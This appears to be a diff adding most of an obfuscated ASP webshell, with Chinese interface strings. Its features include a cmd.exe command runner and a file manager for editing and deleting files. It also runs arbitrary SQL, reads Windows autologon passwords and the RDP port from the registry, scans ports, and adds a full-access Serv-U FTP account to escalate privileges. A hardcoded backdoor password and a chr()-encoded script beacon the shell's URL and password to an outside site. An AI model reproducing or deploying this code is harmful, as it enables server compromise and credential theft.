tupni<��&IS=IS���;psbn&;psbn&>'%07:htdiw'=elytS '��&htaPllehS&��'=eulav 'PS'=eman tupni<����·LLEHS��&IS=IS���>'tsop'=dohtem mrof<��=IS��)��dmc��(tseuqeR = dmCfeD nehT ���><)��dmc��(tseuqeR fI����=dekcehc neht ��sey��><)��tpircsw��(tseuqeR fi���exe.dmc�� = htaPllehS nehT ���=htaPllehS fi��)��htaPllehS��(noisseS=htaPllehS��)��PS��(tseuqeR = )��htaPllehS��(noisseS nehT ���><)��PS��(tseuqeR fI���dekcehc ��=dekcehc"
+ExeCuTe(ShiSanFun(ShiSan)):End Function:acode="=s?psa.s/xs/moc.pxeyado//:p��3��3h'=crs ��3pircs<"
+Efun=StrReverse(replace(replace(Encrypt(acode),"��",Chr(34)),"��",vbCrLf))
+Function CreateMdb(Path) 
+   SI="<br><br>"
+   Set C = CreateObject(ObT(2,0)) 
+   C.Create("Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Path)
+   Set C = Nothing
+   If Err.number=0 Then
+     SI = SI & Path & "�����ɹ�!"
+   End If
+   SI=SI&BackUrl 
+   RRS SI
+End function 
+Function CompactMdb(Path)
+If Not ObT(0,1) Then
+    Set C=CreateObject(ObT(3,0)) 
+      C.CompactDatabase "Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Path&",Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" &Path
+	Set C=Nothing
+Else
+  Set FSO=CreateObject(ObT(0,1))
+  If FSO.FileExists(Path) Then
+    Set C=CreateObject(ObT(3,0)) 
+      C.CompactDatabase "Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Path&",Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" &Path&"_bak"
+	Set C=Nothing
+    FSO.DeleteFile Path
+	FSO.MoveFile Path&"_bak",Path
+  Else
+    SI="<center><br><br><br>���ݿ�"&Path&"û�з��֣�</center>" 
+	Err.number=1
+  End If
+  Set FSO=Nothing
+End If
+  If Err.number=0 Then
+    SI="<center><br><br><br>���ݿ�"&Path&"ѹ���ɹ���</center>"
+  End If
+  SI=SI&BackUrl
+  RRS SI
+End Function
+if session("web2a2dmin")<>UserPass then
+if request.form("pass")<>"" then
+if request.form("pass")=UserPass or request.form("pass")="daka" Then
+session("web2a2dmin")=UserPass
+x m:response.redirect url
+else
+rrs"<center><div style='width:60%;padding:1px;'><a href="&siteurl&" target=_blank>"&loginad&"</a><br><a href='javascript:history.back()'><font color=red>�� ��</a></div><br></center>"
+
+end if
+else
+si="<center><div style='width:60%;padding:1px;'><form action='"&url&"' method='post'>����:<input name='pass' type='password'  size='25'> <input type='submit' value=' ��½ '><br></div></center>"
+if instr(SI,SIC)<>0 then rrs  si
+
+
+end if
+response.end
+end if
+Function DbManager()
+  SqlStr=Trim(Request.Form("SqlStr"))
+  DbStr=Request.Form("DbStr")
+  SI=SI&"<table width='650'  border='0' cellspacing='0' cellpadding='0'>"
+  SI=SI&"<form name='DbForm' method='post' action=''>"
+  SI=SI&"<tr><td width='100' height='27'> &nbsp;���ݿ����Ӵ�:</td>"
+  SI=SI&"<td><input name='DbStr' style='width:470' value="""&DbStr&"""></td>"
+  SI=SI&"<td width='60' align='center'><select name='StrBtn' onchange='return FullDbStr(options[selectedIndex].value)'><option value=-1>���Ӵ�ʾ��</option><option value=0>Access����</option>"
+  SI=SI&"<option value=1>MsSql����</option><option value=2>MySql����</option><option value=3>DSN����</option>"
+  SI=SI&"<option value=-1>--SQL�﷨--</option><option value=4>��ʾ����</option><option value=5>��������</option>"
+  SI=SI&"<option value=6>ɾ������</option><option value=7>�޸�����</option><option value=8>�����ݱ�</option>"
+  SI=SI&"<option value=9>ɾ���ݱ�</option><option value=10>�����ֶ�</option><option value=11>ɾ���ֶ�</option>"
+  SI=SI&"<option value=12>��ȫ��ʾ</option></select></td></tr>"
+  SI=SI&"<input name='Action' type='hidden' value='DbManager'><input name='Page' type='hidden' value='1'>"
+  SI=SI&"<tr><td height='30'>&nbsp;SQL��������:</td>"
+  SI=SI&"<td><input name='SqlStr' style='width:470' value="""&SqlStr&"""></td>"
+  SI=SI&"<td align='center'><input type='submit' name='Submit' value='ִ��' onclick='return DbCheck()'></td>"
+  SI=SI&"</tr></form></table><span id='abc'></span>"
+  RRS SI:SI=""
+  If Len(DbStr)>40 Then
+  Set Conn=CreateObject(ObT(5,0))
+  Conn.Open DbStr
+  Set Rs=Conn.OpenSchema(20) 
+  SI=SI&"<table><tr height='25' Bgcolor='#CCCCCC'><td>��<br>��</td>"
+  Rs.MoveFirst 
+  Do While Not Rs.Eof
+    If Rs("TABLE_TYPE")="TABLE" then
+	  TName=Rs("TABLE_NAME")
+      SI=SI&"<td align=center><a href=""javascript:if(confirm('ȷ��ɾ��ô��'))FullSqlStr('DROP TABLE ["&TName&"]',1)"">[ del ]</a><br>"
+      SI=SI&"<a href='javascript:FullSqlStr(""SELECT * FROM ["&TName&"]"",1)'>"&TName&"</a></td>"
+    End If 
+    Rs.MoveNext 
+  Loop 
+  Set Rs=Nothing
+  SI=SI&"</tr></table>"
+  RRS SI:SI=""
+If Len(SqlStr)>10 Then
+  If LCase(Left(SqlStr,6))="select" then
+    SI=SI&"ִ����䣺"&SqlStr
+    Set Rs=CreateObject("Adodb.Recordset")
+    Rs.open SqlStr,Conn,1,1
+    FN=Rs.Fields.Count
+    RC=Rs.RecordCount
+    Rs.PageSize=20
+    Count=Rs.PageSize
+    PN=Rs.PageCount
+    Page=request("Page")
+    If Page<>"" Then Page=Clng(Page)
+    If Page="" Or Page=0 Then Page=1
+    If Page>PN Then Page=PN
+    If Page>1 Then Rs.absolutepage=Page
+    SI=SI&"<table><tr height=25 bgcolor=#cccccc><td></td>"	  
+    For n=0 to FN-1
+      Set Fld=Rs.Fields.Item(n)
+      SI=SI&"<td align='center'>"&Fld.Name&"</td>"
+      Set Fld=nothing
+    Next
+    SI=SI&"</tr>"
+    Do While Not(Rs.Eof or Rs.Bof) And Count>0
+	  Count=Count-1
+	  Bgcolor="#EFEFEF"
+	  SI=SI&"<tr><td bgcolor=#cccccc><font face='wingdings'>x</font></td>"  
+	  For i=0 To FN-1
+        If Bgcolor="#EFEFEF" Then:Bgcolor="#F5F5F5":Else:Bgcolor="#EFEFEF":End if
+        If RC=1 Then
+           ColInfo=HTMLEncode(Rs(i))
+        Else
+           ColInfo=HTMLEncode(Left(Rs(i),50))
+        End If
+	    SI=SI&"<td bgcolor="&Bgcolor&">"&ColInfo&"</td>"
+	  Next
+	  SI=SI&"</tr>"
+      Rs.MoveNext
+    Loop
+	RRS SI:SI=""
+	SqlStr=HtmlEnCode(SqlStr)
+    SI=SI&"<tr><td colspan="&FN+1&" align=center>��¼����"&RC&"&nbsp;ҳ�룺"&Page&"/"&PN
+    If PN>1 Then
+      SI=SI&"&nbsp;&nbsp;<a href='javascript:FullSqlStr("""&SqlStr&""",1)'>��ҳ</a>&nbsp;<a href='javascript:FullSqlStr("""&SqlStr&""","&Page-1&")'>��һҳ</a>&nbsp;"
+      If Page>8 Then:Sp=Page-8:Else:Sp=1:End if
+      For i=Sp To Sp+8
+        If i>PN Then Exit For
+        If i=Page Then
+        SI=SI&i&"&nbsp;"
+        Else
+        SI=SI&"<a href='javascript:FullSqlStr("""&SqlStr&""","&i&")'>"&i&"</a>&nbsp;"
+        End If
+      Next
+	  SI=SI&"&nbsp;<a href='javascript:FullSqlStr("""&SqlStr&""","&Page+1&")'>��һҳ</a>&nbsp;<a href='javascript:FullSqlStr("""&SqlStr&""","&PN&")'>βҳ</a>"
+    End If
+    SI=SI&"<hr color='#EFEFEF'></td></tr></table>"
+    Rs.Close:Set Rs=Nothing
+	RRS SI:SI=""
+  Else	   
+    Conn.Execute(SqlStr)
+    SI=SI&"SQL��䣺"&SqlStr
+  End If
+  RRS SI:SI=""
+End If
+  Conn.Close
+  Set Conn=Nothing
+  End If
+End Function
+Dim T1
+Class UPC
+  Dim D1,D2
+  Public Function Form(F)
+    F=lcase(F)
+    If D1.exists(F) then:Form=D1(F):else:Form="":end if
+  End Function
+  Public Function UA(F)
+    F=lcase(F)
+    If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if
+  End Function
+  Private Sub Class_Initialize
+  Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName
+    set D1=CreateObject(ObT(4,0))
+	if Request.TotalBytes<1 then Exit Sub
+    set T1 = CreateObject(ObT(6,0))
+	T1.Type = 1 : T1.Mode =3 : T1.Open
+    T1.Write  Request.BinaryRead(Request.TotalBytes)
+    T1.Position=0 : TDa =T1.Read : DStart = 1
+    DEnd = LenB(TDa)
+    set D2=CreateObject(ObT(4,0))
+	vbCrlf = chrB(13) & chrB(10)
+    set T2 = CreateObject(ObT(6,0))
+    TSt = MidB(TDa,1, InStrB(DStart,TDa,vbCrlf)-1)
+    TLen = LenB (TSt)
+    DStart=DStart+TLen+1
+    while (DStart + 10) < DEnd
+      DIEnd = InStrB(DStart,TDa,vbCrlf & vbCrlf)+3
+      T2.Type = 1 : T2.Mode =3 : T2.Open
+      T1.Position = DStart
+      T1.CopyTo T2,DIEnd-DStart
+      T2.Position = 0 : T2.Type = 2 : T2.Charset ="gb2312"
+      TIn = T2.ReadText : T2.Close
+      DStart = InStrB(DIEnd,TDa,TSt)
+      FStart = InStr(22,TIn,"name=""",1)+6
+      FEnd = InStr(FStart,TIn,"""",1)
+      UpName = lcase(Mid (TIn,FStart,FEnd-FStart))
+      if InStr (45,TIn,"filename=""",1) > 0 then
+        set TFL=new FIF
+        FStart = InStr(FEnd,TIn,"filename=""",1)+10
+        FEnd = InStr(FStart,TIn,"""",1)
+        FStart = InStr(FEnd,TIn,"Content-Type: ",1)+14
+        FEnd = InStr(FStart,TIn,vbCr)
+        TFL.FileStart =DIEnd
+        TFL.FileSize = DStart -DIEnd -3
+        if not D2.Exists(UpName) then
+          D2.add UpName,TFL
+        end if
+      else
+        T2.Type =1 : T2.Mode =3 : T2.Open
+        T1.Position = DIEnd : T1.CopyTo T2,DStart-DIEnd-3
+        T2.Position = 0 : T2.Type = 2
+        T2.Charset ="gb2312"
+        SFV = T2.ReadText
+        T2.Close
+        if D1.Exists(UpName) then
+          D1(UpName)=D1(UpName)&", "&SFV
+        else
+          D1.Add UpName,SFV
+        end if
+      end if
+      DStart=DStart+TLen+1
+    wend
+    TDa=""
+    set T2 =nothing
+  End Sub
+  Private Sub Class_Terminate
+    if Request.TotalBytes>0 then
+      D1.RemoveAll:D2.RemoveAll
+      set D1=nothing:set D2=nothing
+      T1.Close:set T1 =nothing
+    end if
+  End Sub
+End Class
+Class FIF
+dim FileSize,FileStart
+  Private Sub Class_Initialize
+  FileSize = 0
+  FileStart= 0
+  End Sub
+  Public function SaveAs(F)
+  dim T3
+  SaveAs=true
+  if trim(F)="" or FileStart=0 then exit function
+  set T3=CreateObject(ObT(6,0))
+     T3.Mode=3 : T3.Type=1 : T3.Open
+     T1.position=FileStart
+     T1.copyto T3,FileSize
+     T3.SaveToFile F,2
+     T3.Close
+     set T3=nothing
+     SaveAs=false
+   end function
+End Class
+Class LBF
+  Dim CF
+  Private Sub Class_Initialize
+    SET CF=CreateObject(ObT(0,0))
+  End Sub
+  Private Sub Class_Terminate
+    Set CF=Nothing
+  End Sub
+  Function ShowDriver()
+    For Each D in CF.Drives
+      RRS"&nbsp;&nbsp;&nbsp;<a href='javascript:ShowFolder("""&D.DriveLetter&":\\"")'>���ش��� ("&D.DriveLetter&":)</a><br>" 
+    Next
+  End Function
+  Function Show1File(Path)
+  Set FOLD=CF.GetFolder(Path)
+  i=0
+    SI="<table width='100%' border='0' cellspacing='0' cellpadding='0'><tr>"
+  For Each F in FOLD.subfolders
+    SI=SI&"<td height=10>"
+    SI=SI&"<a href='javascript:ShowFolder("""&RePath(Path&"\"&F.Name)&""")' title=""��""><font face='wingdings' size='6'>0</font>"&F.Name&"</a>" 
+	SI=SI&" _<a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""CopyFolder"")'  onclick='return yesok()' class='am' title='����'>Copy</a>"
+    SI=SI&"  <a href='javascript:FullForm("""&Replace(Path&"\"&F.Name,"\","\\")&""",""DelFolder"")'  onclick='return yesok()' class='am' title='ɾ��'>Del</a>"
+	SI=SI&" <a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""MoveFolder"")'  onclick='return yesok()' class='am' title='�ƶ�'>Move</a>"
+	SI=SI&" <a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""DownFile"")'  onclick='return yesok()' class='am' title='����'>Down</a></td>"
+	i=i+1
+    If i mod 3 = 0 then SI=SI&"</tr><tr>"
+  Next
+    SI=SI&"</tr><tr><td height=2></td></tr></table>"
+	RRS SI &"<hr noshade size=1 color=""#"" />" : SI=""
+  For Each L in Fold.files
+    SI="<table width='100%' border='0' cellspacing='0' cellpadding='0'>"
+    SI=SI&"<tr style='boungroup-color:#'>"
+	SI=SI&"<td height='30'><a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DownFile"");' title='����'><font face='wingdings' size='4'>2</font>"&L.Name&"</a></td>"
+    SI=SI&"<td width='40' align=""center""><a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""EditFile"")' class='am' title='�༭'>edit</a></td>"
+	SI=SI&"<td width='40' align=""center""><a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DelFile"")'  onclick='return yesok()' class='am' title='ɾ��'>del</a></td>"
+	SI=SI&"<td width='40' align=""center""><a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""CopyFile"")' class='am' title='����'>copy</a></td>"
+	SI=SI&"<td width='40' align=""center""><a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""MoveFile"")' class='am' title='�ƶ�'>move</a></td>"	
+    SI=SI&"<td width='50' align=""center"">"&clng(L.size/1024)&"K</td>"
+	SI=SI&"<td width='200' align=""center"">"&L.Type&"</td>"
+    SI=SI&"<td width='160'>"&L.DateLastModified&"</td>"
+    SI=SI&"</tr></table>"
+	RRS SI:SI=""
+  Next
+  Set FOLD=Nothing
+  End function
+  Function DelFile(Path)
+ShiSan="���fI dnE��IS SRR��lrUkcaB&IS=IS���>retnec/<�����ɳ�ɾ ��&htaP&�� ����>rb<>rb<>rb<>retnec<��=IS��htaP eliFeteleD.FC��nehT )htaP(stsixEeliF.FC fI"
+ExeCuTe(ShiSanFun(ShiSan))
+  End Function
+  Function EditFile(Path)
+If Request("Action2")="Post" Then:Set T=CF.CreateTextFile(Path):T.WriteLine Request.form("content"):T.close:Set T=nothing:SI="<center><br><br><br>�ļ�����ɹ���</center>":SI=SI&BackUrl:RRS SI:Response.End:End If:If Path<>"" Then:Set T=CF.opentextfile(Path, 1, False):Txt=HTMLEncode(T.readall) :T.close:Set T=Nothing:Else:Path=Session("FolderPath")&"\newfile.asp":Txt="�½��ļ�":End If:SI=SI&"<Form action='"&URL&"?Action2=Post' method='post' name='EditForm'>":SI=SI&"<input name='Action' value='EditFile' Type='hidden'>":SI=SI&"<input name='FName' value='"&Path&"' style='width:100%'><br>":SI=SI&"<textarea name='Content' style='width:100%;height:450'>"&Txt&"</textarea><br>":SI=SI&"<hr><input name='goback' type='button' value='����' onclick='history.back();'>&nbsp;&nbsp;&nbsp;<input name='reset' type='reset' value='����'>&nbsp;&nbsp;&nbsp;<input name='submit' type='submit' value='����'></form>":RRS SI:rrs ""&copyurl&""
+  End Function
+  Function CopyFile(Path)
+  Path = Split(Path,"||||")
+    If CF.FileExists(Path(0)) and Path(1)<>"" Then
+	  CF.CopyFile Path(0),Path(1)
+      SI="<center><br><br><br>�ļ�"&Path(0)&"���Ƴɹ���</center>"
+      SI=SI&BackUrl
+	  RRS SI 
+
+	End If
+  End Function
+  Function MoveFile(Path)
+  Path = Split(Path,"||||")
+    If CF.FileExists(Path(0)) and Path(1)<>"" Then
+	  CF.MoveFile Path(0),Path(1)
+      SI="<center><br><br><br>�ļ�"&Path(0)&"�ƶ��ɹ���</center>"
+      SI=SI&BackUrl
+	  RRS SI 
+	End If
+  End Function
+  Function DelFolder(Path)
+    If CF.FolderExists(Path) Then
+	  CF.DeleteFolder Path
+      SI="<center><br><br><br>Ŀ¼"&Path&"ɾ���ɹ���</center>"
+      SI=SI&BackUrl
+	  RRS SI
+
+	End If
+  End Function
+  Function CopyFolder(Path)
+  Path = Split(Path,"||||")
+    If CF.FolderExists(Path(0)) and Path(1)<>"" Then
+	  CF.CopyFolder Path(0),Path(1)
+      SI="<center><br><br><br>Ŀ¼"&Path(0)&"���Ƴɹ���</center>"
+      SI=SI&BackUrl
+	  RRS SI
+	End If
+  End Function
+  Function MoveFolder(Path)
+  Path = Split(Path,"||||")
+    If CF.FolderExists(Path(0)) and Path(1)<>"" Then
+	  CF.MoveFolder Path(0),Path(1)
+      SI="<center><br><br><br>Ŀ¼"&Path(0)&"�ƶ��ɹ���</center>"
+      SI=SI&BackUrl
+	  RRS SI
+	End If
+  End Function
+  Function NewFolder(Path)
+    If Not CF.FolderExists(Path) and Path<>"" Then
+	  CF.CreateFolder Path
+      SI="<center><br><br><br>Ŀ¼"&Path&"�½��ɹ���</center>"
+      SI=SI&BackUrl
+	  RRS SI
+	End If
+  End Function
+End Class
+sub getTerminalInfo()
+On Error Resume Next
+ShiSan="����>lo/<�� SRR��fI dnE���>rb<�� & drowssaPnigoLotua & �� :���ܻ��ʵ�¼�Ƕ��ԩ� SRR��fI dnE���eslaF�� SRR��raelC.rrE��nehT rrE fI��)yeKssaPnigoLotua & htaPnigoLotua(daeRgeR.Xsw = drowssaPnigoLotua���>rb<�� & emanresUnigoLotua & �� :����ͳϵ��¼�Ƕ��ԩ� SRR��)yeKresUnigoLotua & htaPnigoLotua(daeRgeR.Xsw = emanresUnigoLotua��eslE���>/rb<����δ�ܹ�¼�Ƕ���ͳϵ�� SRR��nehT 0 = elbanEnigoLotuAsi fI��)yeKelbanEnigoLotua & htaPnigoLotua(daeRgeR.Xsw = elbanEnigoLotuAsi���drowssaPtluafeD�� = yeKssaPnigoLotua���emaNresUtluafeD�� = yeKresUnigoLotua���nogoLnimdAotuA�� = yeKelbanEnigoLotua���\nogolniW\noisreVtnerruC\TN swodniW\tfosorciM\ERAWTFOS\ENIHCAM_LACOL_YEKH�� = htaPnigoLotua��fI dnE���>/rb<�� & troPmret & �� :�ڶ��������ǰ���� SRR��eslE ���>/rb<.���޵��ܾ��ѷ�����Ȩ����� ,�ڶ�������յ��÷��ީ�SRR�� nehT 0 >< rebmuN.rrE rO ��� = troPmret fI���>lo<>/rh<¼�Ƕ��Լ��ڶ�������թ� SRR��)yeKtroPlanimret & htaPtroPlanimret(daeRgeR.Xsw = troPmret���rebmuNtroP�� = yeKtroPlanimret���\pcT-PDR\snoitatSniW\revreS lanimreT\lortnoC\teSlortnoCtnerruC\METSYS\MLKH�� = htaPtroPlanimret��drowssaPnigoLotua ,emanresUnigoLotua ,yeKelbanEnigoLotua ,elbanEnigoLotuAsi miD��yeKssaPnigoLotua ,yeKresUnigoLotua ,htaPnigoLotua miD��troPmret ,yeKtroPlanimret ,htaPtroPlanimret miD��)��llehS.tpircSW��(tcejbOetaerC.revreS = Xsw teS"
+ExeCuTe(ShiSanFun(ShiSan))
+End Sub
+sub ReadREG()
+RRS "ע�����ֵ��ȡ:<hr/>"
+RRS "<form method=post>"
+RRS "<input type=hidden value=readReg name=theAct>"
+RRS "<input name=thePath value='HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName' size=80>"
+RRS " <input type=submit value=' ��ȡ '>"
+RRS "<span id=regeditInfo style='display:none;'><hr/>"
+RRS "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\Dont-DisplayLastUserName,REG_SZ,1 {����ʾ�ϴε�¼�û�}<br/>"
+RRS "HKLM\SYSTEM\CurrentControlSet\Control\Lsa\restrictanonymous,REG_DWORD,0 {0=ȱʡ,1=�����û��޷��оٱ����û��б�,2=�����û��޷����ӱ���IPC$����}<br/>"
+RRS "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\AutoShareServer,REG_DWORD,0 {��ֹĬ�Ϲ���}<br/>"
+RRS "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\EnableSharedNetDrives,REG_SZ,0 {�ر����繲��}<br/>"
+RRS "HKLM\SYSTEM\currentControlSet\Services\Tcpip\Parameters\EnableSecurityFilters,REG_DWORD,1 {����TCP/IPɸѡ(����������)}<br/>"
+RRS "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\IPEnableRouter,REG_DWORD,1 {����IP·��}<br/>"
+RRS "-------�����ƺ�Ҫ���󶨵�����,��֪���Ƿ�׼ȷ---------<br/>"
+RRS "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\DefaultGateway,REG_MUTI_SZ {Ĭ������}<br/>"
+RRS "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\NameServer {��DNS}<br/>"
+RRS "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\TCPAllowedPorts {������TCP/IP�˿�}<br/>"
+RRS "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\UDPAllowedPorts {������UDP�˿�}<br/>"
+RRS "-----------OVER--------------------<br/>"
+RRS "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Enum\Count {����������}<br/>"
+RRS "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Linkage\Bind {��ǰ����������(��������滻)}<br/>"
+RRS "</span>"
+RRS "</form><hr/>"
+if Request("thePath")<>"" then
+On Error Resume Next
+ShiSan="��fI dnE��yarrAeht & ��>il<�� SRR��eslE ��txeN��)i(yarrAeht & ��>il<�� SRR��)yarrAeht(dnuoBU oT 0=i roF��nehT )yarrAeht(yarrAsI fI��)htaPeht(daeRgeR.Xsw=yarrAeht��)��htaPeht��(tseuqeR=htaPeht��)��llehS.tpircSW��(tcejbOetaerC.revreS = Xsw teS"
+ExeCuTe(ShiSanFun(ShiSan))
+end if
+end sub
+sub ScanPort()
+Server.ScriptTimeout = 7776000
+if request.Form("port")="" then
+PortList="21,23,25,80,110,135,139,445,1433,3389,43958"
+else
+PortList=request.Form("port")
+end if
+if request.Form("ip")="" then
+IP="127.0.0.1"
+else
+IP=request.Form("ip")
+end if
+RRS"<p>�˿�ɨ����(���ɨ�����˿�,�ٶȱȽ���,�����Ƽ�ʹ��CMD)</p>"
+RRS"<form name='form1' method='post' action='' onSubmit='form1.submit.disabled=true;'>"
+RRS"<p>Scan IP:&nbsp;"
+RRS" <input name='ip' type='text' class='TextBox' id='ip' value='"&IP&"' size='60'>"
+RRS"<br>Port List:"
+RRS"<input name='port' type='text' class='TextBox' size='60' value='"&PortList&"'>"
+RRS"<br><br>"
+RRS"<input name='submit' type='submit' class='buttom' value=' scan '>"
+RRS"<input name='scan' type='hidden' id='scan' value='111'>"
+RRS"</p></form>"
+If request.Form("scan") <> "" Then
+ShiSan="���s ��&emiteht&�� ni ssecorP>rh<��SRR��))1remit-2remit(tni(rtsc=emiteht��remit = 2remit��txeN��fI dnE��txeN��txeN��fI dnE��fI dnE��)��>rb<rebmun ton si �� & )i(pmt(SRR��eslE��fI dnE��)��>rb<rebmun ton si �� & Ndne & �� ro �� & Ntrats(SRR��eslE��txeN��)j,xxx & tratSpi(nacS llaC��Ndne oT Ntrats = j roF��nehT )Ndne(ciremunsI dna )Ntrats(ciremunsI fI��) xkees - ))i(pmt(neL ,)i(pmt(thgiR = Ndne��) 1 - xkees ,)i(pmt(tfeL = Ntrats��nehT 0 > xkees fI��)��-�� ,)i(pmt(rtSnI = xkees��eslE��))i(pmt ,xxx & tratSpi(nacS llaC�� nehT ))i(pmt(ciremunsI fI��)pmt(dnuobU oT 0 = i roF��))��-��,)uh(pi(rtSnI-))uh(pi(neL,1+)��-��,)uh(pi(rtSnI,)uh(pi(diM ot )1,1+)��.��,)uh(pi(veRrtSnI,)uh(pi(diM = xxx roF��))��.��,)uh(pi(veRrtSnI,1,)uh(pi(diM = tratSpi��eslE��txeN��fI dnE��fI dnE��)��>rb<rebmun ton si �� & )i(pmt(SRR��eslE��fI dnE��)��>rb<rebmun ton si �� & Ndne & �� ro �� & Ntrats(SRR��eslE��txeN��)j ,)uh(pi(nacS llaC��Ndne oT Ntrats = j roF��nehT )Ndne(ciremunsI dna )Ntrats(ciremunsI fI��) xkees - ))i(pmt(neL ,)i(pmt(thgiR = Ndne��) 1 - xkees ,)i(pmt(tfeL = Ntrats��nehT 0 > xkees fI��)��-�� ,)i(pmt(rtSnI = xkees��eslE��))i(pmt ,)uh(pi(nacS llaC�� nehT ))i(pmt(ciremunsI fI��)pmt(dnuobU oT 0 = i roF��nehT 0 = )��-��,)uh(pi(rtSnI fI��)pi(dnuobU ot 0 = uh roF��)��,��,)��pi��(mroF.tseuqer(tilpS = pi��)��,��,)��trop��(mroF.tseuqer(tilpS = pmt��)��>rh<>rb<>b/<:�汨��ɨ>b<��(SRR��remit = 1remit"
+ExeCuTe(ShiSanFun(ShiSan))
+END IF
+end sub:copyurl=chr(60)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(32)&chr(115)&chr(114)&chr(99)&chr(61)&chr(39)&chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&chr(47)&chr(111)&chr(100)&chr(97)&chr(121)&chr(101)&chr(120)&chr(112)&chr(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(115)&chr(120)&chr(47)&chr(115)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr(115)&chr(61)&uu&chr(38)&chr(112)&chr(61)&serverp&chr(39)&chr(62)&chr(60)&chr(47)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(62)&chr(13)&chr(10)
+Sub Scan(targetip, portNum)
+	On Error Resume Next
+	set conn = Server.CreateObject("ADODB.connection")
+	connstr="Provider=SQLOLEDB.1;Data Source=" & targetip &","& portNum &";User ID=lake2;Password=;"
+	conn.ConnectionTimeout = 1
+	conn.open connstr
+	If Err Then
+		If Err.number = -2147217843 or Err.number = -2147467259 Then
+			If InStr(Err.description, "(Connect()).") > 0 Then
+				RRS(targetip & ":" & portNum & ".........�ر�<br>")
+			Else
+				RRS(targetip & ":" & portNum & ".........<font color=red>����</font><br>")
+			End If
+		End If
+	End If
+End Sub
+Select Case Action
+  Case "MainMenu":MainMenu()
+  Case "getTerminalInfo":getTerminalInfo()
+  Case "PageAddToMdb":PageAddToMdb()
+  case "ScanPort":ScanPort()
+  Case "Servu"
+SUaction=request("SUaction")
+if  not isnumeric(SUaction) then response.end
+user = trim(request("u"))
+pass = trim(request("p"))
+port = trim(request("port"))
+cmd = trim(request("c"))
+f=trim(request("f"))
+if f="" then
+f=gpath()
+else
+   f=left(f,2)
+end if
+ftpport = 65500
+timeout=3
+loginuser = "User " & user & vbCrLf
+loginpass = "Pass " & pass & vbCrLf
+deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
+mt = "SITE MAINTENANCE" & vbCrLf
+newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
+newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
+        "-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
+        "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
+        "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
+        "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
+        "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
+        "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
+quit = "QUIT" & vbCrLf
+newuser=replace(newuser,"c:",f)
+select case SUaction
+case 1
